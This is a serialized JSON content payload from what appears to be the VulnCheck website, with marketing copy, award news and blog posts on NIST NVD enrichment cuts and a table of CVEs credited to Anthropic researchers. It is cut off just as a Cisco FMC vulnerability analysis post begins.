[{"data":1,"prerenderedAt":7845},["ShallowReactive",2],{"index":3,"all-posts":139,"quotes":7820},{"id":4,"title":5,"body":6,"description":7,"extension":8,"landing":9,"meta":53,"navigation":54,"path":55,"platform":56,"seo":81,"stem":82,"threatcon":83,"whitepapers":114,"__hash__":138},"index\u002F0.index.yml","VulnCheck - Outpace Adversaries",null,"Vulnerability intelligence that predicts avenues of attack with speed and accuracy.","yml",{"headline":10,"stats":11,"chart":18},"The cyber threat landscape has changed.",{"from":12,"to":15},{"year":13,"value":14},2020,"1.6 years",{"year":16,"value":17},2025,"21 days",{"title":19,"description":20,"footer":21,"data":22},"From Vulnerability to Exploitation","TTE (Time-to-Exploit) measures the gap between CVE disclosure and confirmed exploitation","Year Published, KEVs, Average Time to Exploitation",[23,28,33,38,43,48],{"year":24,"mean":25,"weaponized":26,"label":27},"2020",567,268,"1.6y",{"year":29,"mean":30,"weaponized":31,"label":32},"2021",227.5,350,"7.6mo",{"year":34,"mean":35,"weaponized":36,"label":37},"2022",365,359,"1y",{"year":39,"mean":40,"weaponized":41,"label":42},"2023",131.5,404,"4.4mo",{"year":44,"mean":45,"weaponized":46,"label":47},"2024",24,436,"24d",{"year":49,"mean":50,"weaponized":51,"label":52},"2025",21,449,"21d",{},true,"\u002F",{"headline":57,"title":58,"features":59,"links":80},"VulnCheck Platform","Exploit Intelligence for Vulnerability Prioritization",[60,65,70,75],{"icon":61,"title":62,"description":63,"to":64},"i-mdi-text-box-search","Exploit & Vulnerability Intelligence","Early access to new vulnerability information not found in the NVD along with dozens of unique fields.","\u002Fproduct\u002Fexploit-intelligence",{"icon":66,"title":67,"description":68,"to":69},"i-mdi-door-open","Initial Access Intelligence","In-house developed exploit PoCs, packet captures, and Suricata signatures to defend against initial access vulnerabilities.","\u002Fproduct\u002Finitial-access-intelligence",{"icon":71,"title":72,"description":73,"to":74},"i-mdi-ip-network-outline","IP Intelligence","Detection of potentially vulnerable systems, attacker command & control (C2) infrastructure, and honeypots.","\u002Fproduct\u002Fip-intelligence",{"icon":76,"title":77,"description":78,"to":79},"i-mdi-bird","Canary Intelligence","Data from globally deployed Internet sensors revealing the first signs of vulnerability exploitation.","\u002Fproduct\u002Fcanary-intelligence",[],{"title":5,"description":7},"0.index",{"headline":84,"title":85,"description":86,"features":87,"links":104},"INTRODUCING","A MOVEMENT TO COUNTER EMERGING THREATS","A place where leaders in cyber threat response collaborate to get better, smarter and faster in how we protect our global economy and national security.",[88,94,99],{"icon":89,"title":90,"description":91,"to":92,"target":93},"i-mdi-microphone","Our Keynote Speakers","Andrew Boyd has spent his career safeguarding national security interests, serving in senior intelligence roles across the CIA. Jen Easterly transformed CISA into a $3 billion powerhouse with over 10,000 personnel, establishing the agency as a cornerstone of U.S. cyber defense.","https:\u002F\u002Fwww.threatcon1.org\u002F","_blank",{"icon":95,"title":96,"description":97,"to":98,"target":93},"i-mdi-flag","Capture the Flag","The THREATCON1 CTF challenges participants with a mix of trivia, PCAP analysis, reverse engineering, and exploitation tasks. Teams are welcome, so bring your crew or join up with others on-site. Prizes will be awarded to the top performers.","https:\u002F\u002Fwww.threatcon1.org\u002Fctf",{"icon":100,"title":101,"description":102,"to":103,"target":93},"i-mdi-trophy","The Tournament","THREATCON1’s golf tournament will be played at Reston National Golf Course on Sunday, September 21, 2025. Featuring a full driving range, short-game practice area, and a 150-seat grill room where we'll offer pre-golf lunch and post-round refreshments.","https:\u002F\u002Fwww.threatcon1.org\u002Fgolf-tournament",[105,109],{"label":106,"to":107,"trailingIcon":108},"Submit Presentation","https:\u002F\u002Fwww.threatcon1.org\u002Fsubmissions","i-mdi-arrow-right",{"label":110,"aria-label":111,"icon":112,"to":92,"target":93,"color":113},"Learn More","Learn More About THREATCON1","i-mdi-calendar","secondary",[115,121,127,133],{"title":116,"subtitle":117,"img":118,"cta":119,"link":120,"external":54},"The 2026 VulnCheck Exploit Intelligence Report","In 2025, barely 1% of disclosed vulnerabilities were exploited in the wild. Yet those that were exploited were operationalized quickly, attracted diverse threat actors, and often caused outsized damage before organizations had a chance to respond. This report identifies which vulnerabilities mattered, why attackers targeted them, and where timing failures left organizations exposed.","\u002Fresources\u002F2026-VEIR-Report-Cover.png","Download The Report","https:\u002F\u002Fwwv.vulncheck.com\u002F2026-vulncheck-exploit-intelligence-report",{"title":122,"subtitle":123,"img":124,"cta":125,"link":126,"external":54},"Speed Matters in Vulnerability Analysis","Learn how to apply VulnCheck NVD++ to reliable workflows and product enrichment with speed, precision and accuracy.","\u002Fthumbnails\u002Fnvd-danger-backlog.png","Download Vulnerability Analysis","https:\u002F\u002Fwwv.vulncheck.com\u002Fnvd-backlog-report",{"title":128,"subtitle":129,"img":130,"cta":131,"link":132,"external":54},"Enrich Your Cyber Platform with Exploit Intelligence","This guide will help unlock use cases for cybersecurity product teams to enrich platform value with the best exploit intelligence in the industry.","\u002Fthumbnails\u002Frethinking-vulnerability-exploit-intelligence.png","Download White Paper","https:\u002F\u002Fwwv.vulncheck.com\u002Frethinking-intel-cyber-platforms-whitepaper",{"title":134,"subtitle":135,"cta":119,"link":136,"external":54,"img":137},"2026 State of Exploitation: Exploring the Network Edge","Derived from the 2026 State of Exploitation Report, this research examines 181 known exploited network edge device vulnerabilities from 2025 and uncovers a significant gap between where exploitation is actually occurring and what most security teams are tracking. More than three-quarters of these vulnerabilities do not appear in CISA KEV, and nearly half affect devices that vendors no longer support. The devices being targeted are not limited to enterprise firewalls, consumer routers, wireless bridges, and mass-market networking equipment are a major part of the picture.","https:\u002F\u002Fwwv.vulncheck.com\u002F2026-network-edge-device-report","\u002Fresources\u002F2026-network-edge-cover.png","ix-KIsmUmJ7KlO_RyghQsSCMfxGkFTg8DZDosgRtACI",{"news":140,"blog":202,"events":7266,"press":7497},[141,162,178],{"id":142,"title":143,"authors":6,"body":144,"date":151,"description":152,"extension":153,"link":154,"logo":155,"meta":156,"navigation":54,"path":157,"seo":158,"source":6,"stem":159,"type":160,"__hash__":161},"news\u002Fnews\u002Fvulncheck-recognized-as-a-2025-sinet16-innovator.md","VulnCheck Named as a Prestigious 2025 SINET16 Innovator",{"type":145,"value":146,"toc":147},"minimark",[],{"title":148,"searchDepth":149,"depth":149,"links":150},"",2,[],"2025-10-15","Company's Unique Approach to Exploit Intelligence Receives Another Elite Industry Recognition","md","\u002Fpress\u002Fvulncheck-recognized-as-a-2025-sinet16-innovator","\u002Fawards\u002Fsinet-16-2025.png",{},"\u002Fnews\u002Fvulncheck-recognized-as-a-2025-sinet16-innovator",{"title":143,"description":152},"news\u002Fvulncheck-recognized-as-a-2025-sinet16-innovator","awards","N2hT7bCf8665cBQ2V36ck33mThVeN9E1JaHVYeoW6dQ",{"id":163,"title":164,"authors":6,"body":165,"date":169,"description":170,"extension":153,"link":171,"logo":172,"meta":173,"navigation":54,"path":174,"seo":175,"source":6,"stem":176,"type":160,"__hash__":177},"news\u002Fnews\u002Fmass-technology-leadership-council-tech-top50-startup-of-the-year-winner.md","The Massachusetts Technology Leadership Council (MTLC) Tech Top 50 Startup of the Year 2025: VulnCheck",{"type":145,"value":166,"toc":167},[],{"title":148,"searchDepth":149,"depth":149,"links":168},[],"2025-03-25","The Massachusetts Technology Leadership Council (MTLC) announced the winners and honorees of its annual Tech Top 50 for 2025 on March 13 which recognizes the leaders powering Massachusetts’ tech ecosystem. VulnCheck won Startup of the Year 2025.","https:\u002F\u002Fwww.mtlc.co\u002F2024-tech-top-50","\u002Fawards\u002Fmtlc_startup_honoree-2025.png",{},"\u002Fnews\u002Fmass-technology-leadership-council-tech-top50-startup-of-the-year-winner",{"title":164,"description":170},"news\u002Fmass-technology-leadership-council-tech-top50-startup-of-the-year-winner","fUU8uG3gWNV_Tltfd586oofmPVnH30h2Z-G8f1IdjU8",{"id":179,"title":180,"authors":6,"body":181,"date":193,"description":194,"extension":153,"link":195,"logo":196,"meta":197,"navigation":54,"path":198,"seo":199,"source":6,"stem":200,"type":160,"__hash__":201},"news\u002Fnews\u002Fforbes-cloud-100.md","Forbes' Cloud 100 List Rising Star",{"type":145,"value":182,"toc":191},[183],[184,185,186],"p",{},[187,188],"img",{"alt":189,"src":190},"alt text","image.png",{"title":148,"searchDepth":149,"depth":149,"links":192},[],"2024-08-05","VulnCheck is honored to be name to the Forbes Cloud 100 List as one of their 20 Rising Stars for our unparalleled vulnerability and exploit data solutions for enterprise, government and cybersecurity solutions providers.","\u002Fpress\u002Fforbes-cloud-100","\u002Fawards\u002Fforbes-cloud-100-2024.jpg",{},"\u002Fnews\u002Fforbes-cloud-100",{"title":180,"description":194},"news\u002Fforbes-cloud-100","riASIyBnmjzsOliPCSL5IQ4_KUI9Ea1uEBzWkiv7Dkk",[203,334,1239],{"id":204,"title":205,"articles":6,"authors":206,"body":212,"date":323,"description":324,"extension":153,"image":6,"link":6,"meta":325,"navigation":54,"path":327,"seo":328,"series":6,"stem":329,"subtype":6,"tags":330,"__hash__":333},"blog\u002Fblog\u002Fexpanding-vulnerability-enrichment.md","VulnCheck’s Commitment to Expanding Access to Vulnerability Enrichment",[207],{"name":208,"avatar":209,"link":210,"linkName":211},"Patrick Garrity","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U06EPQ5RXFU-475c2549c30d-512","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fpatrickmgarrity\u002F","in\u002Fpatrickmgarrity\u002F",{"type":145,"value":213,"toc":317},[214,220,223,226,239,242,245,250,253,264,267,270,279,283,286,292,296,299,303,306,309],[184,215,216],{},[187,217],{"alt":218,"src":219},"VulnCheck Serving Everyone","\u002Fblog\u002Fexpanding-vulnerability-enrichment\u002Fvulncheck-nist.png",[184,221,222],{},"We've heard concerns about National Institute of Standards and Technology (NIST) NVD's announcement this week clarifying their focus will now be much more limited moving forward.",[184,224,225],{},"Starting on April 15, 2026, NIST will prioritize the following CVEs for enrichment:",[227,228,229,233,236],"ul",{},[230,231,232],"li",{},"CVEs appearing in CISA’s Known Exploited Vulnerabilities (KEV) Catalog",[230,234,235],{},"CVEs for software used within the US federal government",[230,237,238],{},"CVEs for critical software as defined by Executive Order 14028",[184,240,241],{},"What this means is that there will be a significant volume of CVEs that will not be enriched by NIST. This news comes after over 2-years of degradation in the NIST NVD enrichment services that started in 2024 after a reduction in funding.",[184,243,244],{},"While we appreciate NIST’s transparency for communicating how they will be prioritizing and resourcing enrichment moving forward, this will continue to exacerbate the data gap that NIST NVD has left across CVE records impacting CPE, CWE and CVSS coverage over the past 2-years, which creates negative security outcomes for organizations in the United States and globally",[246,247,249],"h2",{"id":248},"vulnchecks-commitment-to-the-community","VulnCheck's Commitment to The Community",[184,251,252],{},"In response to NIST NVD’s resource constraints in 2024, VulnCheck launched NVD++ on March 13, 2024, a free Community-accessible service providing:",[227,254,255,258,261],{},[230,256,257],{},"Timely access to NIST NVD data (no 503 Service Unavailables)",[230,259,260],{},"NIST NVD 1.0 compliant downloads (no longer supported by NIST)",[230,262,263],{},"Substantially expanded CPE coverage",[184,265,266],{},"Additionally, VulnCheck’s Exploit & Vulnerability Intelligence commercially-available product, already provides broad coverage for CVSS, CVSS-BT, & CPE lookup. One of the measures we took proactively in the past was to add CVSS scores from several vendor advisories to provide near complete coverage in our commercial offering.",[184,268,269],{},"1000’s of organizations have already adopted VulnCheck NVD++ since we have launched the service in addition to our other community offerings including VulnCheck KEV, VulnCheck XDB, and Report a Vulnerability Service.",[184,271,272,273],{},"Anyone can access VulnCheck NVD++ as part of VulnCheck Community for free today at: ",[274,275,276],"a",{"href":276,"rel":277},"https:\u002F\u002Fwww.vulncheck.com\u002Fnvd2",[278],"nofollow",[246,280,282],{"id":281},"vulncheck-automated-cpe-generation","VulnCheck Automated CPE Generation",[184,284,285],{},"VulnCheck continues to outperform NIST NVD CPE enrichment in both volume of CVEs and speed. This chart provides VulnCheck CPE generation vs. NIST NVD over the past year. We remain committed to continuing to expand coverage.",[184,287,288],{},[187,289],{"alt":290,"src":291},"VulnCheck CPE vs. NIST NVD","\u002Fblog\u002Fexpanding-vulnerability-enrichment\u002Fvulncheck-cpe.png",[246,293,295],{"id":294},"expanding-nvd-enrichment-moving-forward","Expanding NVD++ Enrichment Moving Forward",[184,297,298],{},"VulnCheck will expand our NVD++ community and commercial enrichments over the next month to add CVSS scores to CVE records to provide timely and near complete CVSS coverage.",[246,300,302],{"id":301},"about-vulncheck","About VulnCheck",[184,304,305],{},"VulnCheck is helping organizations not just to solve the vulnerability prioritization challenge - we’re working to help equip any product manager, CSIRT\u002FPSIRT or SecOps team and Threat Hunting team to get faster and more accurate with infinite efficiency using VulnCheck solutions.",[184,307,308],{},"We knew that we needed better data, faster across the board, in our industry. So that’s what we deliver to the market. We’re going to continue to deliver key insights on vulnerability management, exploitation and major trends we can extrapolate from our dataset to continuously support practitioners.",[184,310,311,312,316],{},"Are you interested in learning more? If so, VulnCheck's ",[274,313,62],{"href":314,"rel":315},"https:\u002F\u002Fvulncheck.com\u002Fproduct\u002Fexploit-intelligence",[278]," has broad threat actor coverage. Register and demo our data today.",{"title":148,"searchDepth":149,"depth":149,"links":318},[319,320,321,322],{"id":248,"depth":149,"text":249},{"id":281,"depth":149,"text":282},{"id":294,"depth":149,"text":295},{"id":301,"depth":149,"text":302},"2026-04-16T10:00:00-05:00","In response to NIST NVD's announcement that it will significantly limit CVE enrichment starting April 15, 2026, VulnCheck reaffirms its commitment to filling the data gap through its free NVD++ community service and plans to expand coverage with CVSS scores over the next month",{"slug":326},"expanding-vulnerability-enrichment","\u002Fblog\u002Fexpanding-vulnerability-enrichment",{"title":205,"description":324},"blog\u002Fexpanding-vulnerability-enrichment",[331,332],"cve","nist-nvd","8cA4uhkARDZHCuGktrt-I7sRkQyskN5ZAowKo_6oFWU",{"id":335,"title":336,"articles":6,"authors":337,"body":339,"date":1229,"description":1230,"extension":153,"image":6,"link":6,"meta":1231,"navigation":54,"path":1233,"seo":1234,"series":6,"stem":1235,"subtype":6,"tags":1236,"__hash__":1238},"blog\u002Fblog\u002Fanthropic-glasswing-cves.md","Tracking CVEs Attributed to Anthropic Researchers and Project Glasswing",[338],{"name":208,"avatar":209,"link":210,"linkName":211},{"type":145,"value":340,"toc":1220},[341,344,348,362,365,369,384,388,391,394,397,400,488,492,1141,1144,1182,1186,1189,1192,1195,1202,1206,1209,1211,1213,1215],[184,342,343],{},"Anthropic's Project Glasswing has generated significant attention—but very little concrete data. One question keeps coming up: what exactly did it find, disclose, and receive CVEs for? We've fielded this question repeatedly, so I did the work of tracking down publicly disclosed CVEs credited to the Anthropic research team at this time.",[246,345,347],{"id":346},"key-takeaways","Key Takeaways",[227,349,350,353,356,359],{},[230,351,352],{},"75 CVEs mention “Anthropic”",[230,354,355],{},"40 are actually credited to Anthropic researchers",[230,357,358],{},"Only 1 is explicitly attributed to Glasswing",[230,360,361],{},"10 are from external collaboration programs (Calif.io \u002F MADBugs)",[184,363,364],{},"Taken together, this suggests that while Anthropic researchers are actively contributing to vulnerability discovery and appears to be promising, the publicly attributable impact of Glasswing itself remains limited so far.",[246,366,368],{"id":367},"methodology","Methodology",[184,370,371,372,377,378,383],{},"I started by re-reading the ",[274,373,376],{"href":374,"rel":375},"https:\u002F\u002Fwww.anthropic.com\u002Fglasswing",[278],"Glasswing report"," and the advisories published at ",[274,379,382],{"href":380,"rel":381},"https:\u002F\u002Fred.anthropic.com\u002F",[278],"red.anthropic.com",". Neither source provides a comprehensive CVE list of vulnerabilities discovered by Anthropic. So I decided to search the full CVE record database, and searched every CVE record containing the term \"anthropic\" and reviewed each one.",[246,385,387],{"id":386},"what-disclosed-vulnerabilities-have-been-credited-to-the-anthropic-research-team","What Disclosed Vulnerabilities Have Been Credited to the Anthropic Research Team?",[184,389,390],{},"75 CVE records contain the term \"Anthropic.\" Of those, 40 are credited to Anthropic or Anthropic-affiliated researchers in the credits field. The remaining 35 are CVEs affecting Anthropic tools like Claude Code, MCP Inspector, and third party integrations which are out of scope for this analysis..",[184,392,393],{},"Searching the credits field for \"Anthropic\" is one way to explore this question today, though the credits vary. The 40 break down across three distinct credit attributions: the core Anthropic research team, Nicholas Carlini individually, and Calif.io, an independent security research firm running a program called MADBugs (Month of AI-Discovered Bugs) that credits their work jointly as \"Calif.io in collaboration with Claude and Anthropic Research.\" The 9 wolfSSL CVEs and the NGINX CVE all fall into that third category.",[184,395,396],{},"CVE credits are not standardized and depend on how individual CNAs populate the field, meaning attribution is incomplete and sometimes inconsistent.",[184,398,399],{},"Here is the breakdown by vendor:",[401,402,403,419],"table",{},[404,405,406],"thead",{},[407,408,409,413,416],"tr",{},[410,411,412],"th",{},"Vendor",[410,414,415],{},"Product",[410,417,418],{},"# of CVEs",[420,421,422,434,444,455,464,473],"tbody",{},[407,423,424,428,431],{},[425,426,427],"td",{},"Mozilla",[425,429,430],{},"Firefox",[425,432,433],{},"28",[407,435,436,439,441],{},[425,437,438],{},"wolfSSL",[425,440,438],{},[425,442,443],{},"9",[407,445,446,449,452],{},[425,447,448],{},"F5",[425,450,451],{},"NGINX Plus",[425,453,454],{},"1",[407,456,457,460,462],{},[425,458,459],{},"FreeBSD",[425,461,459],{},[425,463,454],{},[407,465,466,469,471],{},[425,467,468],{},"OpenSSL",[425,470,468],{},[425,472,454],{},[407,474,475,481,483],{},[425,476,477],{},[478,479,480],"strong",{},"Total",[425,482],{},[425,484,485],{},[478,486,487],{},"40",[246,489,491],{"id":490},"the-list-of-40-cves-attributed-to-anthropic","The List of 40 CVEs Attributed to Anthropic",[401,493,494,514],{},[404,495,496],{},[407,497,498,501,504,506,508,511],{},[410,499,500],{},"CVE Number",[410,502,503],{},"Date Published",[410,505,412],{},[410,507,415],{},[410,509,510],{},"CVSS",[410,512,513],{},"Credit",[420,515,516,534,549,564,579,595,610,625,640,655,670,685,700,715,730,745,760,775,790,805,820,836,851,867,883,898,914,929,945,962,979,996,1014,1030,1046,1062,1079,1094,1109,1125],{},[407,517,518,521,524,526,528,531],{},[425,519,520],{},"CVE-2026-2763",[425,522,523],{},"2026-02-24",[425,525,427],{},[425,527,430],{},[425,529,530],{},"9.8",[425,532,533],{},"Evyatar Ben Asher, Keane Lucas, Nicholas Carlini, Newton Cheng, Daniel Freeman, Alex Gaynor, and Joel Weinberger using Claude from Anthropic",[407,535,536,539,541,543,545,547],{},[425,537,538],{},"CVE-2026-2764",[425,540,523],{},[425,542,427],{},[425,544,430],{},[425,546,530],{},[425,548,533],{},[407,550,551,554,556,558,560,562],{},[425,552,553],{},"CVE-2026-2765",[425,555,523],{},[425,557,427],{},[425,559,430],{},[425,561,530],{},[425,563,533],{},[407,565,566,569,571,573,575,577],{},[425,567,568],{},"CVE-2026-2766",[425,570,523],{},[425,572,427],{},[425,574,430],{},[425,576,530],{},[425,578,533],{},[407,580,581,584,586,588,590,593],{},[425,582,583],{},"CVE-2026-2769",[425,585,523],{},[425,587,427],{},[425,589,430],{},[425,591,592],{},"8.8",[425,594,533],{},[407,596,597,600,602,604,606,608],{},[425,598,599],{},"CVE-2026-2770",[425,601,523],{},[425,603,427],{},[425,605,430],{},[425,607,592],{},[425,609,533],{},[407,611,612,615,617,619,621,623],{},[425,613,614],{},"CVE-2026-2771",[425,616,523],{},[425,618,427],{},[425,620,430],{},[425,622,530],{},[425,624,533],{},[407,626,627,630,632,634,636,638],{},[425,628,629],{},"CVE-2026-2772",[425,631,523],{},[425,633,427],{},[425,635,430],{},[425,637,592],{},[425,639,533],{},[407,641,642,645,647,649,651,653],{},[425,643,644],{},"CVE-2026-2773",[425,646,523],{},[425,648,427],{},[425,650,430],{},[425,652,530],{},[425,654,533],{},[407,656,657,660,662,664,666,668],{},[425,658,659],{},"CVE-2026-2774",[425,661,523],{},[425,663,427],{},[425,665,430],{},[425,667,592],{},[425,669,533],{},[407,671,672,675,677,679,681,683],{},[425,673,674],{},"CVE-2026-2775",[425,676,523],{},[425,678,427],{},[425,680,430],{},[425,682,530],{},[425,684,533],{},[407,686,687,690,692,694,696,698],{},[425,688,689],{},"CVE-2026-2785",[425,691,523],{},[425,693,427],{},[425,695,430],{},[425,697,592],{},[425,699,533],{},[407,701,702,705,707,709,711,713],{},[425,703,704],{},"CVE-2026-2786",[425,706,523],{},[425,708,427],{},[425,710,430],{},[425,712,592],{},[425,714,533],{},[407,716,717,720,722,724,726,728],{},[425,718,719],{},"CVE-2026-2787",[425,721,523],{},[425,723,427],{},[425,725,430],{},[425,727,592],{},[425,729,533],{},[407,731,732,735,737,739,741,743],{},[425,733,734],{},"CVE-2026-2788",[425,736,523],{},[425,738,427],{},[425,740,430],{},[425,742,530],{},[425,744,533],{},[407,746,747,750,752,754,756,758],{},[425,748,749],{},"CVE-2026-2789",[425,751,523],{},[425,753,427],{},[425,755,430],{},[425,757,592],{},[425,759,533],{},[407,761,762,765,767,769,771,773],{},[425,763,764],{},"CVE-2026-2791",[425,766,523],{},[425,768,427],{},[425,770,430],{},[425,772,530],{},[425,774,533],{},[407,776,777,780,782,784,786,788],{},[425,778,779],{},"CVE-2026-2796",[425,781,523],{},[425,783,427],{},[425,785,430],{},[425,787,530],{},[425,789,533],{},[407,791,792,795,797,799,801,803],{},[425,793,794],{},"CVE-2026-2797",[425,796,523],{},[425,798,427],{},[425,800,430],{},[425,802,592],{},[425,804,533],{},[407,806,807,810,812,814,816,818],{},[425,808,809],{},"CVE-2026-2799",[425,811,523],{},[425,813,427],{},[425,815,430],{},[425,817,592],{},[425,819,533],{},[407,821,822,825,827,829,831,834],{},[425,823,824],{},"CVE-2026-2804",[425,826,523],{},[425,828,427],{},[425,830,430],{},[425,832,833],{},"5.4",[425,835,533],{},[407,837,838,841,843,845,847,849],{},[425,839,840],{},"CVE-2026-2805",[425,842,523],{},[425,844,427],{},[425,846,430],{},[425,848,530],{},[425,850,533],{},[407,852,853,856,859,861,863,865],{},[425,854,855],{},"CVE-2026-4702",[425,857,858],{},"2026-03-24",[425,860,427],{},[425,862,430],{},[425,864,530],{},[425,866,533],{},[407,868,869,872,874,876,878,881],{},[425,870,871],{},"CVE-2026-4704",[425,873,858],{},[425,875,427],{},[425,877,430],{},[425,879,880],{},"7.5",[425,882,533],{},[407,884,885,888,890,892,894,896],{},[425,886,887],{},"CVE-2026-4705",[425,889,858],{},[425,891,427],{},[425,893,430],{},[425,895,530],{},[425,897,533],{},[407,899,900,903,905,907,909,912],{},[425,901,902],{},"CVE-2026-4718",[425,904,858],{},[425,906,427],{},[425,908,430],{},[425,910,911],{},"8.1",[425,913,533],{},[407,915,916,919,921,923,925,927],{},[425,917,918],{},"CVE-2026-4723",[425,920,858],{},[425,922,427],{},[425,924,430],{},[425,926,530],{},[425,928,533],{},[407,930,931,934,936,938,940,943],{},[425,932,933],{},"CVE-2026-4724",[425,935,858],{},[425,937,427],{},[425,939,430],{},[425,941,942],{},"9.1",[425,944,533],{},[407,946,947,950,952,954,956,959],{},[425,948,949],{},"CVE-2026-27654",[425,951,858],{},[425,953,448],{},[425,955,451],{},[425,957,958],{},"8.2",[425,960,961],{},"Calif.io in collaboration with Claude and Anthropic Research",[407,963,964,967,970,972,974,976],{},[425,965,966],{},"CVE-2026-4747",[425,968,969],{},"2026-03-26",[425,971,459],{},[425,973,459],{},[425,975,592],{},[425,977,978],{},"Nicholas Carlini using Claude, Anthropic",[407,980,981,984,987,989,991,993],{},[425,982,983],{},"CVE-2026-28386",[425,985,986],{},"2026-04-07",[425,988,468],{},[425,990,468],{},[425,992,942],{},[425,994,995],{},"Stanislav Fort (Aisle Research); Pavel Kohout (Aisle Research); Alex Gaynor (Anthropic)",[407,997,998,1001,1004,1006,1008,1011],{},[425,999,1000],{},"CVE-2026-5194",[425,1002,1003],{},"2026-04-09",[425,1005,438],{},[425,1007,438],{},[425,1009,1010],{},"9.3",[425,1012,1013],{},"Nicholas Carlini from Anthropic",[407,1015,1016,1019,1021,1023,1025,1028],{},[425,1017,1018],{},"CVE-2026-5446",[425,1020,1003],{},[425,1022,438],{},[425,1024,438],{},[425,1026,1027],{},"6.0",[425,1029,961],{},[407,1031,1032,1035,1037,1039,1041,1044],{},[425,1033,1034],{},"CVE-2026-5503",[425,1036,1003],{},[425,1038,438],{},[425,1040,438],{},[425,1042,1043],{},"6.9",[425,1045,961],{},[407,1047,1048,1051,1053,1055,1057,1060],{},[425,1049,1050],{},"CVE-2026-5447",[425,1052,1003],{},[425,1054,438],{},[425,1056,438],{},[425,1058,1059],{},"6.3",[425,1061,961],{},[407,1063,1064,1067,1070,1072,1074,1077],{},[425,1065,1066],{},"CVE-2026-5466",[425,1068,1069],{},"2026-04-10",[425,1071,438],{},[425,1073,438],{},[425,1075,1076],{},"7.6",[425,1078,961],{},[407,1080,1081,1084,1086,1088,1090,1092],{},[425,1082,1083],{},"CVE-2026-5477",[425,1085,1069],{},[425,1087,438],{},[425,1089,438],{},[425,1091,958],{},[425,1093,961],{},[407,1095,1096,1099,1101,1103,1105,1107],{},[425,1097,1098],{},"CVE-2026-5479",[425,1100,1069],{},[425,1102,438],{},[425,1104,438],{},[425,1106,1076],{},[425,1108,961],{},[407,1110,1111,1114,1116,1118,1120,1123],{},[425,1112,1113],{},"CVE-2026-5500",[425,1115,1069],{},[425,1117,438],{},[425,1119,438],{},[425,1121,1122],{},"8.7",[425,1124,961],{},[407,1126,1127,1130,1132,1134,1136,1139],{},[425,1128,1129],{},"CVE-2026-5501",[425,1131,1069],{},[425,1133,438],{},[425,1135,438],{},[425,1137,1138],{},"8.6",[425,1140,961],{},[184,1142,1143],{},"CVEs Added Post Blog Publication",[401,1145,1146,1162],{},[404,1147,1148],{},[407,1149,1150,1152,1154,1156,1158,1160],{},[410,1151,500],{},[410,1153,503],{},[410,1155,412],{},[410,1157,415],{},[410,1159,510],{},[410,1161,513],{},[420,1163,1164],{},[407,1165,1166,1169,1172,1175,1178,1180],{},[425,1167,1168],{},"CVE-2026-5588",[425,1170,1171],{},"2026-04-15",[425,1173,1174],{},"Legion of the Bouncy Castle Inc.",[425,1176,1177],{},"BC-JAVA",[425,1179,1059],{},[425,1181,978],{},[246,1183,1185],{"id":1184},"what-vulnerabilities-are-directly-attributable-to-glasswing","What Vulnerabilities Are Directly Attributable to Glasswing?",[184,1187,1188],{},"Despite the attention around Glasswing, only one publicly disclosed CVE can currently be directly tied to it. CVE-2026-4747 (FreeBSD NFS RCE) is explicitly attributed to Glasswing and Mythos Preview by name, described as fully autonomously identified and exploited.",[184,1190,1191],{},"The Glasswing page also references three vulnerabilities without CVE numbers: a 27-year-old OpenBSD flaw, a 16-year-old FFmpeg bug, and Linux kernel privilege escalation chains. All three are still under embargo pending patches.",[184,1193,1194],{},"The broader limitation is that Anthropic committed the details of additional findings via cryptographic hashes prior to public disclosure as they are currently under embargo until a patch is released and the vulnerability is publicly disclosed. The full picture won't be known until public disclosure takes place and Anthropic has indicated a public summary report is expected around July 2026.",[184,1196,1197,1198,1201],{},"The July 2026 report will be the real tell. When Anthropic follows through with a full public accounting of what Glasswing found and fixed, it will provide broader visibility into the details you might be looking for. Until then, the best signals available are the CVE credits field and Anthropic's own advisories at ",[274,1199,382],{"href":380,"rel":1200},[278],".",[246,1203,1205],{"id":1204},"considerations-for-anthropic","Considerations for Anthropic",[184,1207,1208],{},"It would be beneficial for Anthropic to create a dedicated security advisory page where security advisories and vulnerability disclosures were published in a consistent way, to provide a way for consumers to understand the question: what vulnerabilities have been discovered by the Anthropic research team and Project Glasswing?",[246,1210,302],{"id":301},[184,1212,305],{},[184,1214,308],{},[184,1216,311,1217,316],{},[274,1218,62],{"href":314,"rel":1219},[278],{"title":148,"searchDepth":149,"depth":149,"links":1221},[1222,1223,1224,1225,1226,1227,1228],{"id":346,"depth":149,"text":347},{"id":367,"depth":149,"text":368},{"id":386,"depth":149,"text":387},{"id":490,"depth":149,"text":491},{"id":1184,"depth":149,"text":1185},{"id":1204,"depth":149,"text":1205},{"id":301,"depth":149,"text":302},"2026-04-15T10:00:00-05:00","A primary source breakdown of every CVE publicly credited to Anthropic researchers and Project Glasswing, based on a full search of the CVE record database.",{"slug":1232},"anthropic-glasswing-cves","\u002Fblog\u002Fanthropic-glasswing-cves",{"title":336,"description":1230},"blog\u002Fanthropic-glasswing-cves",[331,1237],"ai","lSVHc_NuEoHuRjSXdmTGCf5V2aCFmUoIuhQDnKEJ8MQ",{"id":1240,"title":1241,"articles":6,"authors":1242,"body":1248,"date":7256,"description":7257,"extension":153,"image":6,"link":6,"meta":7258,"navigation":54,"path":7260,"seo":7261,"series":6,"stem":7262,"subtype":6,"tags":7263,"__hash__":7265},"blog\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079.md","CVE-2026-20079 - Cisco FMC Authentication Bypass RCE Analysis",[1243],{"name":1244,"avatar":1245,"link":1246,"linkName":1247},"Cale Black","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U072UD3MW56-12d631dac54f-512","https:\u002F\u002Fhosakacorp.net","hosakacorp.net",{"type":145,"value":1249,"toc":7244},[1250,1255,1269,1273,1285,1288,1345,1350,1353,1370,1378,1382,1390,1399,1406,1417,1420,1423,1430,1448,1457,1463,1813,1819,1825,1875,1890,1894,1901,2206,2213,2220,2230,2482,2492,2515,2518,3086,3089,3111,3129,3136,3200,3389,3399,3458,3648,3654,3657,3663,3667,3670,3676,3679,3720,3746,3749,3756,3765,3790,3800,3967,3989,4088,4109,4115,4119,4139,4588,4598,4611,4627,4731,4746,5078,5089,5467,5481,5485,5488,5556,5567,5633,5695,5787,5790,5810,5961,5964,6104,6113,6140,6143,6226,6355,6359,6378,6830,6843,6974,6977,7154,7166,7172,7182,7191,7193,7212,7240],[1251,1252],"check-list",{":list":1253,"ico":1254,"title":347},"[\"CVE-2026-20079 is a CVSS 10.0 RCE 